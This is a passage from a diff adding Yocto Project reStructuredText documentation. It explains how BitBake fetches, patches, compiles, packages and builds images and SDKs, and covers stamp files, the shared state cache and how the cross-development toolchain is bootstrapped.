+tasks to generate packages and place them into the package holding area
+(e.g. ``do_package_write_ipk`` for IPK packages). See the
+":ref:`ref-tasks-package_write_deb`",
+":ref:`ref-tasks-package_write_ipk`",
+":ref:`ref-tasks-package_write_rpm`",
+and
+":ref:`ref-tasks-package_write_tar`"
+sections in the Yocto Project Reference Manual for additional
+information. As an example, consider a scenario where an IPK packaging
+manager is being used and package architecture support for both i586 and
+qemux86 exist. Packages for the i586 architecture are placed in
+``build/tmp/deploy/ipk/i586``, while packages for the qemux86
+architecture are placed in ``build/tmp/deploy/ipk/qemux86``.
+
+.. _bitbake-dev-environment:
+
+BitBake Tool
+------------
+
+The OpenEmbedded build system uses
+:term:`BitBake` to produce images and
+Software Development Kits (SDKs). You can see from the `general workflow
+figure <#general-workflow-figure>`__, the BitBake area consists of
+several functional areas. This section takes a closer look at each of
+those areas.
+
+.. note::
+
+   Separate documentation exists for the BitBake tool. See the
+   BitBake User Manual
+   for reference material on BitBake.
+
+.. _source-fetching-dev-environment:
+
+Source Fetching
+~~~~~~~~~~~~~~~
+
+The first stages of building a recipe are to fetch and unpack the source
+code:
+
+.. image:: figures/source-fetching.png
+   :align: center
+
+The :ref:`ref-tasks-fetch` and
+:ref:`ref-tasks-unpack` tasks fetch
+the source files and unpack them into the
+:term:`Build Directory`.
+
+.. note::
+
+   For every local file (e.g.
+   file://
+   ) that is part of a recipe's
+   SRC_URI
+   statement, the OpenEmbedded build system takes a checksum of the file
+   for the recipe and inserts the checksum into the signature for the
+   do_fetch
+   task. If any local file has been modified, the
+   do_fetch
+   task and all tasks that depend on it are re-executed.
+
+By default, everything is accomplished in the Build Directory, which has
+a defined structure. For additional general information on the Build
+Directory, see the ":ref:`structure-core-build`" section in
+the Yocto Project Reference Manual.
+
+Each recipe has an area in the Build Directory where the unpacked source
+code resides. The :term:`S` variable points
+to this area for a recipe's unpacked source code. The name of that
+directory for any given recipe is defined from several different
+variables. The preceding figure and the following list describe the
+Build Directory's hierarchy:
+
+-  :term:`TMPDIR`: The base directory
+   where the OpenEmbedded build system performs all its work during the
+   build. The default base directory is the ``tmp`` directory.
+
+-  :term:`PACKAGE_ARCH`: The
+   architecture of the built package or packages. Depending on the
+   eventual destination of the package or packages (i.e. machine
+   architecture, :term:`Build Host`, SDK, or
+   specific machine), ``PACKAGE_ARCH`` varies. See the variable's
+   description for details.
+
+-  :term:`TARGET_OS`: The operating
+   system of the target device. A typical value would be "linux" (e.g.
+   "qemux86-poky-linux").
+
+-  :term:`PN`: The name of the recipe used
+   to build the package. This variable can have multiple meanings.
+   However, when used in the context of input files, ``PN`` represents
+   the name of the recipe.
+
+-  :term:`WORKDIR`: The location
+   where the OpenEmbedded build system builds a recipe (i.e. does the
+   work to create the package).
+
+   -  :term:`PV`: The version of the
+      recipe used to build the package.
+
+   -  :term:`PR`: The revision of the
+      recipe used to build the package.
+
+-  :term:`S`: Contains the unpacked source
+   files for a given recipe.
+
+   -  :term:`BPN`: The name of the recipe
+      used to build the package. The ``BPN`` variable is a version of
+      the ``PN`` variable but with common prefixes and suffixes removed.
+
+   -  :term:`PV`: The version of the
+      recipe used to build the package.
+
+.. note::
+
+   In the previous figure, notice that two sample hierarchies exist: one
+   based on package architecture (i.e.
+   PACKAGE_ARCH
+   ) and one based on a machine (i.e.
+   MACHINE
+   ). The underlying structures are identical. The differentiator being
+   what the OpenEmbedded build system is using as a build target (e.g.
+   general architecture, a build host, an SDK, or a specific machine).
+
+.. _patching-dev-environment:
+
+Patching
+~~~~~~~~
+
+Once source code is fetched and unpacked, BitBake locates patch files
+and applies them to the source files:
+
+.. image:: figures/patching.png
+   :align: center
+
+The :ref:`ref-tasks-patch` task uses a
+recipe's :term:`SRC_URI` statements
+and the :term:`FILESPATH` variable
+to locate applicable patch files.
+
+Default processing for patch files assumes the files have either
+``*.patch`` or ``*.diff`` file types. You can use ``SRC_URI`` parameters
+to change the way the build system recognizes patch files. See the
+:ref:`ref-tasks-patch` task for more
+information.
+
+BitBake finds and applies multiple patches for a single recipe in the
+order in which it locates the patches. The ``FILESPATH`` variable
+defines the default set of directories that the build system uses to
+search for patch files. Once found, patches are applied to the recipe's
+source files, which are located in the
+:term:`S` directory.
+
+For more information on how the source directories are created, see the
+"`Source Fetching <#source-fetching-dev-environment>`__" section. For
+more information on how to create patches and how the build system
+processes patches, see the
+":ref:`dev-manual/dev-manual-common-tasks:patching code`"
+section in the
+Yocto Project Development Tasks Manual. You can also see the
+":ref:`sdk-manual/sdk-extensible:use \`\`devtool modify\`\` to modify the source of an existing component`"
+section in the Yocto Project Application Development and the Extensible
+Software Development Kit (SDK) manual and the
+":ref:`kernel-dev/kernel-dev-common:using traditional kernel development to patch the kernel`"
+section in the Yocto Project Linux Kernel Development Manual.
+
+.. _configuration-compilation-and-staging-dev-environment:
+
+Configuration, Compilation, and Staging
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+After source code is patched, BitBake executes tasks that configure and
+compile the source code. Once compilation occurs, the files are copied
+to a holding area (staged) in preparation for packaging:
+
+.. image:: figures/configuration-compile-autoreconf.png
+   :align: center
+
+This step in the build process consists of the following tasks:
+
+-  :ref:`ref-tasks-prepare_recipe_sysroot`:
+   This task sets up the two sysroots in
+   ``${``\ :term:`WORKDIR`\ ``}``
+   (i.e. ``recipe-sysroot`` and ``recipe-sysroot-native``) so that
+   during the packaging phase the sysroots can contain the contents of
+   the
+   :ref:`ref-tasks-populate_sysroot`
+   tasks of the recipes on which the recipe containing the tasks
+   depends. A sysroot exists for both the target and for the native
+   binaries, which run on the host system.
+
+-  *do_configure*: This task configures the source by enabling and
+   disabling any build-time and configuration options for the software
+   being built. Configurations can come from the recipe itself as well
+   as from an inherited class. Additionally, the software itself might
+   configure itself depending on the target for which it is being built.
+
+   The configurations handled by the
+   :ref:`ref-tasks-configure` task
+   are specific to configurations for the source code being built by the
+   recipe.
+
+   If you are using the
+   :ref:`autotools <ref-classes-autotools>` class,
+   you can add additional configuration options by using the
+   :term:`EXTRA_OECONF` or
+   :term:`PACKAGECONFIG_CONFARGS`
+   variables. For information on how this variable works within that
+   class, see the
+   :ref:`autotools <ref-classes-autotools>` class
+   :yocto_git:`here </cgit/cgit.cgi/poky/tree/meta/classes/autotools.bbclass>`.
+
+-  *do_compile*: Once a configuration task has been satisfied,
+   BitBake compiles the source using the
+   :ref:`ref-tasks-compile` task.
+   Compilation occurs in the directory pointed to by the
+   :term:`B` variable. Realize that the
+   ``B`` directory is, by default, the same as the
+   :term:`S` directory.
+
+-  *do_install*: After compilation completes, BitBake executes the
+   :ref:`ref-tasks-install` task.
+   This task copies files from the ``B`` directory and places them in a
+   holding area pointed to by the :term:`D`
+   variable. Packaging occurs later using files from this holding
+   directory.
+
+.. _package-splitting-dev-environment:
+
+Package Splitting
+~~~~~~~~~~~~~~~~~
+
+After source code is configured, compiled, and staged, the build system
+analyzes the results and splits the output into packages:
+
+.. image:: figures/analysis-for-package-splitting.png
+   :align: center
+
+The :ref:`ref-tasks-package` and
+:ref:`ref-tasks-packagedata`
+tasks combine to analyze the files found in the
+:term:`D` directory and split them into
+subsets based on available packages and files. Analysis involves the
+following as well as other items: splitting out debugging symbols,
+looking at shared library dependencies between packages, and looking at
+package relationships.
+
+The ``do_packagedata`` task creates package metadata based on the
+analysis such that the build system can generate the final packages. The
+:ref:`ref-tasks-populate_sysroot`
+task stages (copies) a subset of the files installed by the
+:ref:`ref-tasks-install` task into
+the appropriate sysroot. Working, staged, and intermediate results of
+the analysis and package splitting process use several areas:
+
+-  :term:`PKGD`: The destination
+   directory (i.e. ``package``) for packages before they are split into
+   individual packages.
+
+-  :term:`PKGDESTWORK`: A
+   temporary work area (i.e. ``pkgdata``) used by the ``do_package``
+   task to save package metadata.
+
+-  :term:`PKGDEST`: The parent
+   directory (i.e. ``packages-split``) for packages after they have been
+   split.
+
+-  :term:`PKGDATA_DIR`: A shared,
+   global-state directory that holds packaging metadata generated during
+   the packaging process. The packaging process copies metadata from
+   ``PKGDESTWORK`` to the ``PKGDATA_DIR`` area where it becomes globally
+   available.
+
+-  :term:`STAGING_DIR_HOST`:
+   The path for the sysroot for the system on which a component is built
+   to run (i.e. ``recipe-sysroot``).
+
+-  :term:`STAGING_DIR_NATIVE`:
+   The path for the sysroot used when building components for the build
+   host (i.e. ``recipe-sysroot-native``).
+
+-  :term:`STAGING_DIR_TARGET`:
+   The path for the sysroot used when a component that is built to
+   execute on a system and it generates code for yet another machine
+   (e.g. cross-canadian recipes).
+
+The :term:`FILES` variable defines the
+files that go into each package in
+:term:`PACKAGES`. If you want
+details on how this is accomplished, you can look at
+:yocto_git:`package.bbclass </cgit/cgit.cgi/poky/tree/meta/classes/package.bbclass>`.
+
+Depending on the type of packages being created (RPM, DEB, or IPK), the
+:ref:`do_package_write_* <ref-tasks-package_write_deb>`
+task creates the actual packages and places them in the Package Feed
+area, which is ``${TMPDIR}/deploy``. You can see the "`Package
+Feeds <#package-feeds-dev-environment>`__" section for more detail on
+that part of the build process.
+
+.. note::
+
+   Support for creating feeds directly from the
+   deploy/\*
+   directories does not exist. Creating such feeds usually requires some
+   kind of feed maintenance mechanism that would upload the new packages
+   into an official package feed (e.g. the Ångström distribution). This
+   functionality is highly distribution-specific and thus is not
+   provided out of the box.
+
+.. _image-generation-dev-environment:
+
+Image Generation
+~~~~~~~~~~~~~~~~
+
+Once packages are split and stored in the Package Feeds area, the build
+system uses BitBake to generate the root filesystem image:
+
+.. image:: figures/image-generation.png
+   :align: center
+
+The image generation process consists of several stages and depends on
+several tasks and variables. The
+:ref:`ref-tasks-rootfs` task creates
+the root filesystem (file and directory structure) for an image. This
+task uses several key variables to help create the list of packages to
+actually install:
+
+-  :term:`IMAGE_INSTALL`: Lists
+   out the base set of packages from which to install from the Package
+   Feeds area.
+
+-  :term:`PACKAGE_EXCLUDE`:
+   Specifies packages that should not be installed into the image.
+
+-  :term:`IMAGE_FEATURES`:
+   Specifies features to include in the image. Most of these features
+   map to additional packages for installation.
+
+-  :term:`PACKAGE_CLASSES`:
+   Specifies the package backend (e.g. RPM, DEB, or IPK) to use and
+   consequently helps determine where to locate packages within the
+   Package Feeds area.
+
+-  :term:`IMAGE_LINGUAS`:
+   Determines the language(s) for which additional language support
+   packages are installed.
+
+-  :term:`PACKAGE_INSTALL`:
+   The final list of packages passed to the package manager for
+   installation into the image.
+
+With :term:`IMAGE_ROOTFS`
+pointing to the location of the filesystem under construction and the
+``PACKAGE_INSTALL`` variable providing the final list of packages to
+install, the root file system is created.
+
+Package installation is under control of the package manager (e.g.
+dnf/rpm, opkg, or apt/dpkg) regardless of whether or not package
+management is enabled for the target. At the end of the process, if
+package management is not enabled for the target, the package manager's
+data files are deleted from the root filesystem. As part of the final
+stage of package installation, post installation scripts that are part
+of the packages are run. Any scripts that fail to run on the build host
+are run on the target when the target system is first booted. If you are
+using a 
+:ref:`read-only root filesystem <dev-manual/dev-manual-common-tasks:creating a read-only root filesystem>`,
+all the post installation scripts must succeed on the build host during
+the package installation phase since the root filesystem on the target
+is read-only.
+
+The final stages of the ``do_rootfs`` task handle post processing. Post
+processing includes creation of a manifest file and optimizations.
+
+The manifest file (``.manifest``) resides in the same directory as the
+root filesystem image. This file lists out, line-by-line, the installed
+packages. The manifest file is useful for the
+:ref:`testimage <ref-classes-testimage*>` class,
+for example, to determine whether or not to run specific tests. See the
+:term:`IMAGE_MANIFEST`
+variable for additional information.
+
+Optimizing processes that are run across the image include ``mklibs``,
+``prelink``, and any other post-processing commands as defined by the
+:term:`ROOTFS_POSTPROCESS_COMMAND`
+variable. The ``mklibs`` process optimizes the size of the libraries,
+while the ``prelink`` process optimizes the dynamic linking of shared
+libraries to reduce start up time of executables.
+
+After the root filesystem is built, processing begins on the image
+through the :ref:`ref-tasks-image`
+task. The build system runs any pre-processing commands as defined by
+the
+:term:`IMAGE_PREPROCESS_COMMAND`
+variable. This variable specifies a list of functions to call before the
+build system creates the final image output files.
+
+The build system dynamically creates ``do_image_*`` tasks as needed,
+based on the image types specified in the
+:term:`IMAGE_FSTYPES` variable.
+The process turns everything into an image file or a set of image files
+and can compress the root filesystem image to reduce the overall size of
+the image. The formats used for the root filesystem depend on the
+``IMAGE_FSTYPES`` variable. Compression depends on whether the formats
+support compression.
+
+As an example, a dynamically created task when creating a particular
+image type would take the following form:
+::
+
+   do_image_type
+
+So, if the type
+as specified by the ``IMAGE_FSTYPES`` were ``ext4``, the dynamically
+generated task would be as follows:
+::
+
+   do_image_ext4
+
+The final task involved in image creation is the
+:ref:`do_image_complete <ref-tasks-image-complete>`
+task. This task completes the image by applying any image post
+processing as defined through the
+:term:`IMAGE_POSTPROCESS_COMMAND`
+variable. The variable specifies a list of functions to call once the
+build system has created the final image output files.
+
+.. note::
+
+   The entire image generation process is run under
+   Pseudo. Running under Pseudo ensures that the files in the root filesystem
+   have correct ownership.
+
+.. _sdk-generation-dev-environment:
+
+SDK Generation
+~~~~~~~~~~~~~~
+
+The OpenEmbedded build system uses BitBake to generate the Software
+Development Kit (SDK) installer scripts for both the standard SDK and
+the extensible SDK (eSDK):
+
+.. image:: figures/sdk-generation.png
+   :align: center
+
+.. note::
+
+   For more information on the cross-development toolchain generation,
+   see the ":ref:`overview-manual/overview-manual-concepts:cross-development toolchain generation`"
+   section. For information on advantages gained when building a
+   cross-development toolchain using the do_populate_sdk task, see the
+   ":ref:`sdk-manual/sdk-appendix-obtain:building an sdk installer`" section in
+   the Yocto Project Application Development and the Extensible Software
+   Development Kit (eSDK) manual.
+
+Like image generation, the SDK script process consists of several stages
+and depends on many variables. The
+:ref:`ref-tasks-populate_sdk`
+and
+:ref:`ref-tasks-populate_sdk_ext`
+tasks use these key variables to help create the list of packages to
+actually install. For information on the variables listed in the figure,
+see the "`Application Development SDK <#sdk-dev-environment>`__"
+section.
+
+The ``do_populate_sdk`` task helps create the standard SDK and handles
+two parts: a target part and a host part. The target part is the part
+built for the target hardware and includes libraries and headers. The
+host part is the part of the SDK that runs on the
+:term:`SDKMACHINE`.
+
+The ``do_populate_sdk_ext`` task helps create the extensible SDK and
+handles host and target parts differently than its counter part does for
+the standard SDK. For the extensible SDK, the task encapsulates the
+build system, which includes everything needed (host and target) for the
+SDK.
+
+Regardless of the type of SDK being constructed, the tasks perform some
+cleanup after which a cross-development environment setup script and any
+needed configuration files are created. The final output is the
+Cross-development toolchain installation script (``.sh`` file), which
+includes the environment setup script.
+
+Stamp Files and the Rerunning of Tasks
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+For each task that completes successfully, BitBake writes a stamp file
+into the :term:`STAMPS_DIR`
+directory. The beginning of the stamp file's filename is determined by
+the :term:`STAMP` variable, and the end
+of the name consists of the task's name and current `input
+checksum <#overview-checksums>`__.
+
+.. note::
+
+   This naming scheme assumes that
+   BB_SIGNATURE_HANDLER
+   is "OEBasicHash", which is almost always the case in current
+   OpenEmbedded.
+
+To determine if a task needs to be rerun, BitBake checks if a stamp file
+with a matching input checksum exists for the task. If such a stamp file
+exists, the task's output is assumed to exist and still be valid. If the
+file does not exist, the task is rerun.
+
+.. note::
+
+   The stamp mechanism is more general than the shared state (sstate)
+   cache mechanism described in the "`Setscene Tasks and Shared
+   State <#setscene-tasks-and-shared-state>`__" section. BitBake avoids
+   rerunning any task that has a valid stamp file, not just tasks that
+   can be accelerated through the sstate cache.
+
+   However, you should realize that stamp files only serve as a marker
+   that some work has been done and that these files do not record task
+   output. The actual task output would usually be somewhere in
+   :term:`TMPDIR` (e.g. in some
+   recipe's :term:`WORKDIR`.) What
+   the sstate cache mechanism adds is a way to cache task output that
+   can then be shared between build machines.
+
+Since ``STAMPS_DIR`` is usually a subdirectory of ``TMPDIR``, removing
+``TMPDIR`` will also remove ``STAMPS_DIR``, which means tasks will
+properly be rerun to repopulate ``TMPDIR``.
+
+If you want some task to always be considered "out of date", you can
+mark it with the :ref:`nostamp <bitbake:bitbake-user-manual/bitbake-user-manual-metadata:variable flags>`
+varflag. If some other task depends on such a task, then that task will
+also always be considered out of date, which might not be what you want.
+
+For details on how to view information about a task's signature, see the
+":ref:`dev-manual/dev-manual-common-tasks:viewing task variable dependencies`"
+section in the Yocto Project Development Tasks Manual.
+
+Setscene Tasks and Shared State
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+The description of tasks so far assumes that BitBake needs to build
+everything and no available prebuilt objects exist. BitBake does support
+skipping tasks if prebuilt objects are available. These objects are
+usually made available in the form of a shared state (sstate) cache.
+
+.. note::
+
+   For information on variables affecting sstate, see the
+   :term:`SSTATE_DIR`
+   and
+   :term:`SSTATE_MIRRORS`
+   variables.
+
+The idea of a setscene task (i.e ``do_``\ taskname\ ``_setscene``) is a
+version of the task where instead of building something, BitBake can
+skip to the end result and simply place a set of files into specific
+locations as needed. In some cases, it makes sense to have a setscene
+task variant (e.g. generating package files in the
+:ref:`do_package_write_* <ref-tasks-package_write_deb>`
+task). In other cases, it does not make sense (e.g. a
+:ref:`ref-tasks-patch` task or a
+:ref:`ref-tasks-unpack` task) since
+the work involved would be equal to or greater than the underlying task.
+
+In the build system, the common tasks that have setscene variants are
+:ref:`ref-tasks-package`,
+``do_package_write_*``,
+:ref:`ref-tasks-deploy`,
+:ref:`ref-tasks-packagedata`, and
+:ref:`ref-tasks-populate_sysroot`.
+Notice that these tasks represent most of the tasks whose output is an
+end result.
+
+The build system has knowledge of the relationship between these tasks
+and other preceding tasks. For example, if BitBake runs
+``do_populate_sysroot_setscene`` for something, it does not make sense
+to run any of the ``do_fetch``, ``do_unpack``, ``do_patch``,
+``do_configure``, ``do_compile``, and ``do_install`` tasks. However, if
+``do_package`` needs to be run, BitBake needs to run those other tasks.
+
+It becomes more complicated if everything can come from an sstate cache
+because some objects are simply not required at all. For example, you do
+not need a compiler or native tools, such as quilt, if nothing exists to
+compile or patch. If the ``do_package_write_*`` packages are available
+from sstate, BitBake does not need the ``do_package`` task data.
+
+To handle all these complexities, BitBake runs in two phases. The first
+is the "setscene" stage. During this stage, BitBake first checks the
+sstate cache for any targets it is planning to build. BitBake does a
+fast check to see if the object exists rather than a complete download.
+If nothing exists, the second phase, which is the setscene stage,
+completes and the main build proceeds.
+
+If objects are found in the sstate cache, the build system works
+backwards from the end targets specified by the user. For example, if an
+image is being built, the build system first looks for the packages
+needed for that image and the tools needed to construct an image. If
+those are available, the compiler is not needed. Thus, the compiler is
+not even downloaded. If something was found to be unavailable, or the
+download or setscene task fails, the build system then tries to install
+dependencies, such as the compiler, from the cache.
+
+The availability of objects in the sstate cache is handled by the
+function specified by the
+:term:`bitbake:BB_HASHCHECK_FUNCTION`
+variable and returns a list of available objects. The function specified
+by the
+:term:`bitbake:BB_SETSCENE_DEPVALID`
+variable is the function that determines whether a given dependency
+needs to be followed, and whether for any given relationship the
+function needs to be passed. The function returns a True or False value.
+
+.. _images-dev-environment:
+
+Images
+------
+
+The images produced by the build system are compressed forms of the root
+filesystem and are ready to boot on a target device. You can see from
+the `general workflow figure <#general-workflow-figure>`__ that BitBake
+output, in part, consists of images. This section takes a closer look at
+this output:
+
+.. image:: figures/images.png
+   :align: center
+
+.. note::
+
+   For a list of example images that the Yocto Project provides, see the
+   ":doc:`../ref-manual/ref-images`" chapter in the Yocto Project Reference
+   Manual.
+
+The build process writes images out to the :term:`Build Directory`
+inside the
+``tmp/deploy/images/machine/`` folder as shown in the figure. This
+folder contains any files expected to be loaded on the target device.
+The :term:`DEPLOY_DIR` variable
+points to the ``deploy`` directory, while the
+:term:`DEPLOY_DIR_IMAGE`
+variable points to the appropriate directory containing images for the
+current configuration.
+
+-  kernel-image: A kernel binary file. The
+   :term:`KERNEL_IMAGETYPE`
+   variable determines the naming scheme for the kernel image file.
+   Depending on this variable, the file could begin with a variety of
+   naming strings. The ``deploy/images/``\ machine directory can contain
+   multiple image files for the machine.
+
+-  root-filesystem-image: Root filesystems for the target device (e.g.
+   ``*.ext3`` or ``*.bz2`` files). The
+   :term:`IMAGE_FSTYPES`
+   variable determines the root filesystem image type. The
+   ``deploy/images/``\ machine directory can contain multiple root
+   filesystems for the machine.
+
+-  kernel-modules: Tarballs that contain all the modules built for the
+   kernel. Kernel module tarballs exist for legacy purposes and can be
+   suppressed by setting the
+   :term:`MODULE_TARBALL_DEPLOY`
+   variable to "0". The ``deploy/images/``\ machine directory can
+   contain multiple kernel module tarballs for the machine.
+
+-  bootloaders: If applicable to the target machine, bootloaders
+   supporting the image. The ``deploy/images/``\ machine directory can
+   contain multiple bootloaders for the machine.
+
+-  symlinks: The ``deploy/images/``\ machine folder contains a symbolic
+   link that points to the most recently built file for each machine.
+   These links might be useful for external scripts that need to obtain
+   the latest version of each file.
+
+.. _sdk-dev-environment:
+
+Application Development SDK
+---------------------------
+
+In the `general workflow figure <#general-workflow-figure>`__, the
+output labeled "Application Development SDK" represents an SDK. The SDK
+generation process differs depending on whether you build an extensible
+SDK (e.g. ``bitbake -c populate_sdk_ext`` imagename) or a standard SDK
+(e.g. ``bitbake -c populate_sdk`` imagename). This section takes a
+closer look at this output:
+
+.. image:: figures/sdk.png
+   :align: center
+
+The specific form of this output is a set of files that includes a
+self-extracting SDK installer (``*.sh``), host and target manifest
+files, and files used for SDK testing. When the SDK installer file is
+run, it installs the SDK. The SDK consists of a cross-development
+toolchain, a set of libraries and headers, and an SDK environment setup
+script. Running this installer essentially sets up your
+cross-development environment. You can think of the cross-toolchain as
+the "host" part because it runs on the SDK machine. You can think of the
+libraries and headers as the "target" part because they are built for
+the target hardware. The environment setup script is added so that you
+can initialize the environment before using the tools.
+
+.. note::
+
+   -  The Yocto Project supports several methods by which you can set up
+      this cross-development environment. These methods include
+      downloading pre-built SDK installers or building and installing
+      your own SDK installer.
+
+   -  For background information on cross-development toolchains in the
+      Yocto Project development environment, see the "`Cross-Development
+      Toolchain Generation <#cross-development-toolchain-generation>`__"
+      section.
+
+   -  For information on setting up a cross-development environment, see
+      the :doc:`../sdk-manual/sdk-manual` manual.
+
+All the output files for an SDK are written to the ``deploy/sdk`` folder
+inside the :term:`Build Directory` as
+shown in the previous figure. Depending on the type of SDK, several
+variables exist that help configure these files. The following list
+shows the variables associated with an extensible SDK:
+
+-  :term:`DEPLOY_DIR`: Points to
+   the ``deploy`` directory.
+
+-  :term:`SDK_EXT_TYPE`:
+   Controls whether or not shared state artifacts are copied into the
+   extensible SDK. By default, all required shared state artifacts are
+   copied into the SDK.
+
+-  :term:`SDK_INCLUDE_PKGDATA`:
+   Specifies whether or not packagedata is included in the extensible
+   SDK for all recipes in the "world" target.
+
+-  :term:`SDK_INCLUDE_TOOLCHAIN`:
+   Specifies whether or not the toolchain is included when building the
+   extensible SDK.
+
+-  :term:`SDK_LOCAL_CONF_WHITELIST`:
+   A list of variables allowed through from the build system
+   configuration into the extensible SDK configuration.
+
+-  :term:`SDK_LOCAL_CONF_BLACKLIST`:
+   A list of variables not allowed through from the build system
+   configuration into the extensible SDK configuration.
+
+-  :term:`SDK_INHERIT_BLACKLIST`:
+   A list of classes to remove from the
+   :term:`INHERIT` value globally
+   within the extensible SDK configuration.
+
+This next list, shows the variables associated with a standard SDK:
+
+-  :term:`DEPLOY_DIR`: Points to
+   the ``deploy`` directory.
+
+-  :term:`SDKMACHINE`: Specifies
+   the architecture of the machine on which the cross-development tools
+   are run to create packages for the target hardware.
+
+-  :term:`SDKIMAGE_FEATURES`:
+   Lists the features to include in the "target" part of the SDK.
+
+-  :term:`TOOLCHAIN_HOST_TASK`:
+   Lists packages that make up the host part of the SDK (i.e. the part
+   that runs on the ``SDKMACHINE``). When you use
+   ``bitbake -c populate_sdk imagename`` to create the SDK, a set of
+   default packages apply. This variable allows you to add more
+   packages.
+
+-  :term:`TOOLCHAIN_TARGET_TASK`:
+   Lists packages that make up the target part of the SDK (i.e. the part
+   built for the target hardware).
+
+-  :term:`SDKPATH`: Defines the
+   default SDK installation path offered by the installation script.
+
+-  :term:`SDK_HOST_MANIFEST`:
+   Lists all the installed packages that make up the host part of the
+   SDK. This variable also plays a minor role for extensible SDK
+   development as well. However, it is mainly used for the standard SDK.
+
+-  :term:`SDK_TARGET_MANIFEST`:
+   Lists all the installed packages that make up the target part of the
+   SDK. This variable also plays a minor role for extensible SDK
+   development as well. However, it is mainly used for the standard SDK.
+
+Cross-Development Toolchain Generation
+======================================
+
+The Yocto Project does most of the work for you when it comes to
+creating :ref:`sdk-manual/sdk-intro:the cross-development toolchain`. This
+section provides some technical background on how cross-development
+toolchains are created and used. For more information on toolchains, you
+can also see the :doc:`../sdk-manual/sdk-manual` manual.
+
+In the Yocto Project development environment, cross-development
+toolchains are used to build images and applications that run on the
+target hardware. With just a few commands, the OpenEmbedded build system
+creates these necessary toolchains for you.
+
+The following figure shows a high-level build environment regarding
+toolchain construction and use.
+
+.. image:: figures/cross-development-toolchains.png
+   :align: center
+
+Most of the work occurs on the Build Host. This is the machine used to
+build images and generally work within the the Yocto Project
+environment. When you run
+:term:`BitBake` to create an image, the
+OpenEmbedded build system uses the host ``gcc`` compiler to bootstrap a
+cross-compiler named ``gcc-cross``. The ``gcc-cross`` compiler is what
+BitBake uses to compile source files when creating the target image. You
+can think of ``gcc-cross`` simply as an automatically generated
+cross-compiler that is used internally within BitBake only.
+
+.. note::
+
+   The extensible SDK does not use
+   gcc-cross-canadian
+   since this SDK ships a copy of the OpenEmbedded build system and the
+   sysroot within it contains
+   gcc-cross
+   .
+
+The chain of events that occurs when ``gcc-cross`` is bootstrapped is as
+follows:
+::
+
+   gcc -> binutils-cross -> gcc-cross-initial -> linux-libc-headers -> glibc-initial -> glibc -> gcc-cross -> gcc-runtime
+
+-  ``gcc``: The build host's GNU Compiler Collection (GCC).
+
+-  ``binutils-cross``: The bare minimum binary utilities needed in order
+   to run the ``gcc-cross-initial`` phase of the bootstrap operation.
+
+-  ``gcc-cross-initial``: An early stage of the bootstrap process for
+   creating the cross-compiler. This stage builds enough of the
+   ``gcc-cross``, the C library, and other pieces needed to finish
+   building the final cross-compiler in later stages. This tool is a
+   "native" package (i.e. it is designed to run on the build host).
+
+-  ``linux-libc-headers``: Headers needed for the cross-compiler.
+
+-  ``glibc-initial``: An initial version of the Embedded GNU C Library
+   (GLIBC) needed to bootstrap ``glibc``.
+
+-  ``glibc``: The GNU C Library.
+
+-  ``gcc-cross``: The final stage of the bootstrap process for the
+   cross-compiler. This stage results in the actual cross-compiler that
+   BitBake uses when it builds an image for a targeted device.
+
+   .. note::
+
+      If you are replacing this cross compiler toolchain with a custom
+      version, you must replace
+      gcc-cross
+      .
+
+   This tool is also a "native" package (i.e. it is designed to run on
+   the build host).
+
+-  ``gcc-runtime``: Runtime libraries resulting from the toolchain
+   bootstrapping process. This tool produces a binary that consists of
+   the runtime libraries need for the targeted device.
+
+You can use the OpenEmbedded build system to build an installer for the
+relocatable SDK used to develop applications. When you run the
+installer, it installs the toolchain, which contains the development
+tools (e.g., ``gcc-cross-canadian``, ``binutils-cross-canadian``, and
+other ``nativesdk-*`` tools), which are tools native to the SDK (i.e.
+native to :term:`SDK_ARCH`), you
+need to cross-compile and test your software. The figure shows the
+commands you use to easily build out this toolchain. This
+cross-development toolchain is built to execute on the
+:term:`SDKMACHINE`, which might or
+might not be the same machine as the Build Host.
+
+.. note::
+
+   If your target architecture is supported by the Yocto Project, you
+   can take advantage of pre-built images that ship with the Yocto
+   Project and already contain cross-development toolchain installers.
+
+Here is the bootstrap process for the relocatable toolchain:
+::
+
+   gcc -> binutils-crosssdk -> gcc-crosssdk-initial -> linux-libc-headers -> glibc-initial -> nativesdk-glibc -> gcc-crosssdk -> gcc-cross-canadian
+
+-  ``gcc``: The build host's GNU Compiler Collection (GCC).
+
+-  ``binutils-crosssdk``: The bare minimum binary utilities needed in
+   order to run the ``gcc-crosssdk-initial`` phase of the bootstrap
+   operation.
+
+-  ``gcc-crosssdk-initial``: An early stage of the bootstrap process for
+   creating the cross-compiler. This stage builds enough of the
+   ``gcc-crosssdk`` and supporting pieces so that the final stage of the
+   bootstrap process can produce the finished cross-compiler. This tool
+   is a "native" binary that runs on the build host.
+
+-  ``linux-libc-headers``: Headers needed for the cross-compiler.
+
+-  ``glibc-initial``: An initial version of the Embedded GLIBC needed to
+   bootstrap ``nativesdk-glibc``.
+
+-  ``nativesdk-glibc``: The Embedded GLIBC needed to bootstrap the
+   ``gcc-crosssdk``.
+
+-  ``gcc-crosssdk``: The final stage of the bootstrap process for the
+   relocatable cross-compiler. The ``gcc-crosssdk`` is a transitory
+   compiler and never leaves the build host. Its purpose is to help in
+   the bootstrap process to create the eventual ``gcc-cross-canadian``
+   compiler, which is relocatable. This tool is also a "native" package
+   (i.e. it is designed to run on the build host).
+
+-  ``gcc-cross-canadian``: The final relocatable cross-compiler. When
+   run on the :term:`SDKMACHINE`,
+   this tool produces executable code that runs on the target device.
+   Only one cross-canadian compiler is produced per architecture since
+   they can be targeted at different processor optimizations using
+   configurations passed to the compiler through the compile commands.
+   This circumvents the need for multiple compilers and thus reduces the
+   size of the toolchains.
+
+.. note::
+
+   For information on advantages gained when building a
+   cross-development toolchain installer, see the
+   ":ref:`sdk-manual/sdk-appendix-obtain:building an sdk installer`" appendix
+   in the Yocto Project Application Development and the
+   Extensible Software Development Kit (eSDK) manual.
+
+Shared State Cache
+==================
+
+By design, the OpenEmbedded build system builds everything from scratch
+unless :term:`BitBake` can determine
+that parts do not need to be rebuilt. Fundamentally, building from
+scratch is attractive as it means all parts are built fresh and no
+possibility of stale data exists that can cause problems. When
+developers hit problems, they typically default back to building from
+scratch so they have a know state from the start.
+
+Building an image from scratch is both an advantage and a disadvantage
+to the process. As mentioned in the previous paragraph, building from
+scratch ensures that everything is current and starts from a known
